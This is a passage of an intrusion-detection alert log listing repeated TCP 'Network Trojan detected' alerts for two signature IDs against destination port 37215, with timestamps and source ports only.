          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714243
          SID:2829579
          Source Port:60794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.671647
          SID:2829579
          Source Port:38988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247373
          SID:2829579
          Source Port:49582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297819
          SID:2835222
          Source Port:37414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596130
          SID:2829579
          Source Port:39026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653034
          SID:2835222
          Source Port:44592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468629
          SID:2835222
          Source Port:60316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821306
          SID:2835222
          Source Port:32984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132960
          SID:2829579
          Source Port:40862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010665
          SID:2835222
          Source Port:47788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165431
          SID:2829579
          Source Port:45944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603496
          SID:2835222
          Source Port:33608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713490
          SID:2835222
          Source Port:55930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986728
          SID:2835222
          Source Port:52754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986737
          SID:2835222
          Source Port:49534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164480
          SID:2835222
          Source Port:54800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646157
          SID:2829579
          Source Port:58610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475812
          SID:2829579
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161931
          SID:2829579
          Source Port:49750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012735
          SID:2835222
          Source Port:42398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165969
          SID:2829579
          Source Port:60156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208107
          SID:2829579
          Source Port:56736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159216
          SID:2835222
          Source Port:33138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724216
          SID:2829579
          Source Port:46608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398331
          SID:2829579
          Source Port:50236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721357
          SID:2829579
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538800
          SID:2829579
          Source Port:54498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207854
          SID:2829579
          Source Port:47922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250707
          SID:2835222
          Source Port:38668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165715
          SID:2835222
          Source Port:43018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719128
          SID:2829579
          Source Port:45664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688151
          SID:2829579
          Source Port:59938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224762
          SID:2829579
          Source Port:47672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129738
          SID:2835222
          Source Port:38168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036313
          SID:2829579
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272329
          SID:2835222
          Source Port:49584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008489
          SID:2829579
          Source Port:44706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987419
          SID:2835222
          Source Port:38686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077747
          SID:2829579
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157198
          SID:2829579
          Source Port:41640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539880
          SID:2835222
          Source Port:45300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478139
          SID:2829579
          Source Port:32908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925194
          SID:2835222
          Source Port:46604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292220
          SID:2829579
          Source Port:46532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283170
          SID:2835222
          Source Port:36602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102495
          SID:2835222
          Source Port:38210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603134
          SID:2835222
          Source Port:34934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163509
          SID:2829579
          Source Port:56734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209794
          SID:2829579
          Source Port:36098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283528
          SID:2829579
          Source Port:42332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037709
          SID:2835222
          Source Port:42556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600854
          SID:2835222
          Source Port:39956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244931
          SID:2829579
          Source Port:46124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643986
          SID:2829579
          Source Port:55166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945396
          SID:2829579
          Source Port:36008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158108
          SID:2835222
          Source Port:60696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413870
          SID:2835222
          Source Port:33488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563318
          SID:2835222
          Source Port:57718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035017
          SID:2835222
          Source Port:47600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418554
          SID:2829579
          Source Port:36150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206805
          SID:2835222
          Source Port:40990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291749
          SID:2835222
          Source Port:40660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606688
          SID:2835222
          Source Port:55876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989944
          SID:2829579
          Source Port:38490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468079
          SID:2835222
          Source Port:58036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296514
          SID:2835222
          Source Port:55144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571508
          SID:2835222
          Source Port:59708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988732
          SID:2835222
          Source Port:38576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946338
          SID:2829579
          Source Port:35060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539697
          SID:2829579
          Source Port:46918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397411
          SID:2835222
          Source Port:60664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603579
          SID:2835222
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133324
          SID:2835222
          Source Port:40578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894609
          SID:2835222
          Source Port:50096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718037
          SID:2829579
          Source Port:42838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418332
          SID:2829579
          Source Port:42368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.093307
          SID:2835222
          Source Port:42560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718296
          SID:2829579
          Source Port:47432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472127
          SID:2835222
          Source Port:40522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397768
          SID:2829579
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298984
          SID:2835222
          Source Port:44898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951899
          SID:2829579
          Source Port:34208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207824
          SID:2835222
          Source Port:46944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946721
          SID:2835222
          Source Port:50920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605665
          SID:2835222
          Source Port:50230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713828
          SID:2829579
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286124
          SID:2829579
          Source Port:45478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713736
          SID:2835222
          Source Port:35712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242408
          SID:2829579
          Source Port:50490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563654
          SID:2829579
          Source Port:60778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223273
          SID:2835222
          Source Port:43348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559146
          SID:2829579
          Source Port:59074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942136
          SID:2835222
          Source Port:53748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865047
          SID:2835222
          Source Port:47952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398054
          SID:2835222
          Source Port:34808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165209
          SID:2835222
          Source Port:47606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079434
          SID:2835222
          Source Port:57264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604640
          SID:2829579
          Source Port:43972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478921
          SID:2835222
          Source Port:48438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397867
          SID:2829579
          Source Port:42646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600324
          SID:2835222
          Source Port:56674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103307
          SID:2829579
          Source Port:43802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399370
          SID:2835222
          Source Port:35624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469700
          SID:2829579
          Source Port:37390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082810
          SID:2829579
          Source Port:49952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167271
          SID:2829579
          Source Port:40972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008042
          SID:2829579
          Source Port:58194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645597
          SID:2835222
          Source Port:58002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166766
          SID:2835222
          Source Port:50416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222572
          SID:2835222
          Source Port:57890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604579
          SID:2829579
          Source Port:44734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822565
          SID:2835222
          Source Port:35454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565137
          SID:2835222
          Source Port:60008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869970
          SID:2829579
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602681
          SID:2835222
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085380
          SID:2835222
          Source Port:52036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718070
          SID:2829579
          Source Port:49836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398350
          SID:2835222
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162883
          SID:2829579
          Source Port:59778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720789
          SID:2829579
          Source Port:38286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167671
          SID:2835222
          Source Port:50382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157942
          SID:2829579
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538649
          SID:2829579
          Source Port:60062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014862
          SID:2835222
          Source Port:41748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.633988
          SID:2835222
          Source Port:53216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418441
          SID:2835222
          Source Port:60284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166308
          SID:2829579
          Source Port:54802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818356
          SID:2829579
          Source Port:43890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166212
          SID:2829579
          Source Port:41786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918019
          SID:2829579
          Source Port:48620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157080
          SID:2835222
          Source Port:45942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718374
          SID:2829579
          Source Port:57266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163950
          SID:2829579
          Source Port:54006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860637
          SID:2835222
          Source Port:39034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465040
          SID:2835222
          Source Port:48942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719695
          SID:2835222
          Source Port:34262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667922
          SID:2835222
          Source Port:39604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538103
          SID:2829579
          Source Port:50636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644668
          SID:2835222
          Source Port:49260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078034
          SID:2829579
          Source Port:38614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398915
          SID:2829579
          Source Port:44130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129123
          SID:2835222
          Source Port:60706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076592
          SID:2835222
          Source Port:57590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398238
          SID:2829579
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988372
          SID:2829579
          Source Port:54692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030646
          SID:2835222
          Source Port:49290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277285
          SID:2829579
          Source Port:52282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908926
          SID:2835222
          Source Port:52620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299431
          SID:2829579
          Source Port:47272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469642
          SID:2829579
          Source Port:33476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241880
          SID:2829579
          Source Port:36940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076335
          SID:2829579
          Source Port:58226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299140
          SID:2835222
          Source Port:37912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292260
          SID:2829579
          Source Port:47354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928197
          SID:2829579
          Source Port:51982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990363
          SID:2835222
          Source Port:59962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163372
          SID:2829579
          Source Port:47508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916577
          SID:2835222
          Source Port:56122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104402
          SID:2835222
          Source Port:52144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914412
          SID:2829579
          Source Port:45720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288645
          SID:2835222
          Source Port:42690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990759
          SID:2829579
          Source Port:34634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718019
          SID:2835222
          Source Port:55566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035849
          SID:2835222
          Source Port:47030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719309
          SID:2835222
          Source Port:51036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167271
          SID:2829579
          Source Port:39688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863693
          SID:2835222
          Source Port:36292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719609
          SID:2835222
          Source Port:56782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904403
          SID:2829579
          Source Port:54488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209019
          SID:2829579
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600360
          SID:2829579
          Source Port:55848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947175
          SID:2835222
          Source Port:51710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716018
          SID:2829579
          Source Port:41652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131580
          SID:2829579
          Source Port:33338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719695
          SID:2829579
          Source Port:57886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718629
          SID:2829579
          Source Port:57576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719076
          SID:2835222
          Source Port:50964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163697
          SID:2829579
          Source Port:40596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157060
          SID:2829579
          Source Port:39080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249650
          SID:2829579
          Source Port:49104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413153
          SID:2835222
          Source Port:58340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718527
          SID:2835222
          Source Port:39934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645352
          SID:2829579
          Source Port:53144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915748
          SID:2829579
          Source Port:52398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081887
          SID:2835222
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306361
          SID:2829579
          Source Port:52666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226149
          SID:2829579
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156896
          SID:2829579
          Source Port:54522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.996184
          SID:2835222
          Source Port:51908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469420
          SID:2829579
          Source Port:40484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892838
          SID:2835222
          Source Port:33676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131620
          SID:2835222
          Source Port:41688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168320
          SID:2835222
          Source Port:48060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951584
          SID:2835222
          Source Port:58680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038686
          SID:2835222
          Source Port:36540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600417
          SID:2829579
          Source Port:54858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667881
          SID:2829579
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
